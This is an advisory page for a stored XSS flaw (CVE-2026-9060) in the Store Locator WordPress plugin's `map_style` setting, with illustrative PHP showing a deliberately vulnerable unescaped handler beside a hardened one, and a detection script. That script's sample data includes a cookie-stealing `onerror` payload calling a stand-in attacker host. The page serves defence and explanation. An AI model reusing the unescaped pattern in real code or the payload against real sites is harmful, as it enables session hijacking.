CVE-2026-9060
Status: Received - Intake
Stored XSS in Store Locator WordPress Plugin

Publication date: 2026-06-10

Last updated on: 2026-06-10

Assigner: WPScan

Description
The Store Locator WordPress plugin before 1.6.6 does not sanitize and escape one of its settings (`map_style`) before storing it and outputting it on the plugin's admin page. This allows high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network, where site administrators lack that capability and the injected script runs when the super admin visits the page).
EPSS Evaluated: N/A
Affected Vendors & Products
Vendor: agile_store_locator
Product: store_locator_wordpress_plugin
Version range: all versions before 1.6.6 (1.6.6 itself excluded, i.e. fixed)
CWE
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Executive Summary

CVE-2026-9060 affects the Agile Store Locator WordPress plugin in versions prior to 1.6.6. It is a Stored Cross-Site Scripting (XSS) issue: a high-privileged user such as an administrator can inject script through the `map_style` setting.

The plugin neither sanitizes the value before storing it nor escapes it when rendering it on its admin page, so the stored payload executes as arbitrary JavaScript in the browser of any user who views that page.

This is a vulnerability rather than expected behaviour because WordPress normally limits raw HTML to users holding the `unfiltered_html` capability. When that capability is disallowed (in a multisite network only super admins have it, not site administrators, and it can also be removed everywhere with `DISALLOW_UNFILTERED_HTML`), a site administrator is still able to store script that runs when the super admin visits the page.

The injection is performed by sending a crafted AJAX request to the plugin's settings handler with the XSS payload in the `map_style` parameter; the payload then fires whenever the admin page is loaded.
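The flaw and its fix side by side, as an added example that is not the plugin's own code: the real option name, AJAX action, nonce action and function names are not on this page, so `asl_map_style`, `asl_save_map_style` and `asl_settings` are hypothetical stand-ins, and the assumption that a map style is text/JSON rather than markup is mine.

```php
<?php
// Added example, not the plugin's code. Hook name, option name and nonce action
// are hypothetical; the plugin's real identifiers are not on the advisory page.

// ---- Vulnerable pattern: stored raw, echoed raw -------------------------------
function asl_save_map_style_vulnerable() {
    check_ajax_referer( 'asl_settings', 'nonce' );      // CSRF check is present ...
    if ( ! current_user_can( 'manage_options' ) ) {     // ... and so is a capability check,
        wp_send_json_error( 'forbidden', 403 );         // but not the one that matters here.
    }
    // Stored verbatim: an administrator who lacks unfiltered_html (every site admin
    // in a multisite network) can still persist "<script>...".
    update_option( 'asl_map_style', wp_unslash( $_POST['map_style'] ?? '' ) );
    wp_send_json_success();
}

function asl_render_map_style_vulnerable() {
    // Emitted without escaping: the stored payload runs for whoever opens the
    // settings page, a super admin included.
    echo '<textarea name="map_style">' . get_option( 'asl_map_style', '' ) . '</textarea>';
}

// ---- Hardened pattern: sanitize on input, honour unfiltered_html, escape on output ----
function asl_save_map_style_hardened() {
    check_ajax_referer( 'asl_settings', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $raw = wp_unslash( $_POST['map_style'] ?? '' );
    if ( ! is_string( $raw ) ) {
        wp_send_json_error( 'invalid map_style', 400 );
    }
    // Assumption: a map style is text/JSON, never markup, so every tag can go.
    // If a setting genuinely had to carry HTML, the WordPress rule would be
    //   $value = current_user_can( 'unfiltered_html' ) ? $raw : wp_kses_post( $raw );
    // i.e. the capability the advisory says the plugin did not respect.
    $value = sanitize_text_field( $raw );
    update_option( 'asl_map_style', $value );
    wp_send_json_success( [ 'map_style' => $value ] );
}

function asl_render_map_style_hardened() {
    // Escape at output no matter what is stored, so a value injected before the
    // fix is rendered inert instead of executed.
    echo '<textarea name="map_style">' . esc_textarea( get_option( 'asl_map_style', '' ) ) . '</textarea>';
}

// Only the hardened handler is wired up; the vulnerable one is kept for contrast.
add_action( 'wp_ajax_asl_save_map_style', 'asl_save_map_style_hardened' );
```

Note that the vulnerable handler already verifies a nonce and `manage_options`, which is exactly why this only counts as a vulnerability when `unfiltered_html` is disallowed: the missing control is the one WordPress applies to markup-bearing fields, and escaping at output time is what makes an already-stored payload harmless without waiting for the setting to be cleaned.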

Impact Analysis

This vulnerability allows high-privileged users to perform Stored Cross-Site Scripting attacks, which can lead to the execution of arbitrary JavaScript code within the admin interface.

Such attacks can be used to hijack administrator sessions, steal sensitive information, manipulate site settings, or perform other malicious actions with administrator privileges.

Because the affected page is an admin page, a successful attack compromises the integrity of the WordPress site. The multisite case is the most serious: a site administrator who is deliberately denied `unfiltered_html` can still run script in the session of a super admin who holds network-wide privileges.

Detection Guidance

This vulnerability can be detected by checking if the Agile Store Locator WordPress plugin version is prior to 1.6.6, as those versions are affected.

Additionally, detection can involve inspecting the `map_style` setting for suspicious or malicious JavaScript code injections.

A practical approach is to review the plugin's stored settings or database entries related to `map_style` for unexpected script tags or payloads.

Since the vulnerability is exploited via crafted AJAX requests, monitoring POST requests to WordPress's admin-ajax.php (the endpoint plugin AJAX actions are served from) whose body sets `map_style` to a value containing markup, event handlers or script may help detect exploitation attempts.

Specific commands are not provided in the available resources.
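A version check plus a scan for injected values, as an added example for the guidance above (not from the advisory or the plugin): the option names, the AJAX action and every sample string are constructed, and the assumption that `map_style` holds Google-Maps-style JSON is mine. It runs with the PHP CLI against an exported list of options or a captured admin-ajax.php POST body.

```php
<?php
// Added example for the detection guidance; not code from the page or the plugin.
// Option names, the AJAX action name and all sample data below are constructed.

/** Pull the "Version:" field out of a WordPress plugin file header; null if missing. */
function asl_header_version( string $plugin_file_contents ): ?string {
    if ( preg_match( '/^\s*\*?\s*Version:\s*([0-9][\w.\-]*)/mi', $plugin_file_contents, $m ) ) {
        return $m[1];
    }
    return null;
}

/** Affected range per the advisory: every version before 1.6.6. */
function asl_version_is_affected( string $version ): bool {
    return version_compare( $version, '1.6.6', '<' );
}

/**
 * Heuristic markers that have no business in a map style setting.
 * Returns the names of the markers that matched (empty array = clean).
 */
function asl_xss_markers( string $value ): array {
    $patterns = [
        'script tag'       => '/<\s*script\b/i',
        'risky tag'        => '/<\s*(?:img|svg|iframe|object|embed|math)\b/i',
        'event handler'    => '/\bon[a-z]+\s*=/i',
        'javascript: URI'  => '/javascript\s*:/i',
        'entity-encoded <' => '/&(?:lt|#0*60|#x0*3c);/i',
    ];
    $hits = [];
    foreach ( $patterns as $name => $re ) {
        if ( preg_match( $re, $value ) ) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/**
 * Scan a name => value map of stored options (e.g. dumped from the database) and
 * report every option whose name mentions map_style and whose value looks injected.
 */
function asl_scan_options( array $options ): array {
    $findings = [];
    foreach ( $options as $name => $value ) {
        if ( stripos( (string) $name, 'map_style' ) === false ) {
            continue;
        }
        $hits = asl_xss_markers( (string) $value );
        if ( $hits ) {
            $findings[ $name ] = $hits;
        }
    }
    return $findings;
}

/**
 * Scan one admin-ajax.php POST body (application/x-www-form-urlencoded) and
 * return the markers found in its map_style parameter, or [] if none or absent.
 */
function asl_scan_ajax_body( string $body ): array {
    parse_str( $body, $params );   // also URL-decodes, so %3Cscript%3E becomes <script>
    if ( ! isset( $params['map_style'] ) || ! is_string( $params['map_style'] ) ) {
        return [];
    }
    return asl_xss_markers( $params['map_style'] );
}

// ---- Constructed sample data (not real captures) ------------------------------
$sample_header  = "<?php\n/*\n * Plugin Name: Agile Store Locator\n * Version: 1.6.5\n */\n";
$sample_options = [
    // Benign Google-Maps-style JSON (assumed format of the setting).
    'asl_map_style'    => '[{"featureType":"water","stylers":[{"color":"#a2daf2"}]}]',
    // What an injected value would look like.
    'asl_map_style_v2' => '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">',
    'blogname'         => 'Example Site',
];
$sample_body = 'action=asl_save_settings&map_style=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&nonce=abc';

$ver = asl_header_version( $sample_header );
printf( "plugin version %s: %s\n", $ver, asl_version_is_affected( $ver ) ? 'AFFECTED' : 'fixed' );
foreach ( asl_scan_options( $sample_options ) as $name => $hits ) {
    printf( "option %s looks injected: %s\n", $name, implode( ', ', $hits ) );
}
$hits = asl_scan_ajax_body( $sample_body );
printf( "ajax body: %s\n", $hits ? 'suspicious (' . implode( ', ', $hits ) . ')' : 'clean' );
```

The markers are deliberately coarse: a legitimate map style is JSON and contains no tags, no `on*=` attributes and no `javascript:` URIs, so any hit is worth a look, while a value that is already entity-encoded (`&lt;script`) is flagged separately because it is harmless in a text field but may indicate a partial clean-up rather than a real fix.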

Mitigation Strategies

The immediate mitigation step is to update the Agile Store Locator WordPress plugin to version 1.6.6 or later, where the vulnerability has been fixed.

Until the update can be applied, limit who holds administrator rights on affected sites (the attacker must already be an administrator) and keep non-essential users away from the Store Locator admin pages, since the stored payload fires for anyone who views them.

Also review the `map_style` setting and remove any injected script. Do this after updating as well: a payload stored before the fix is still sitting in the setting until someone cleans it.
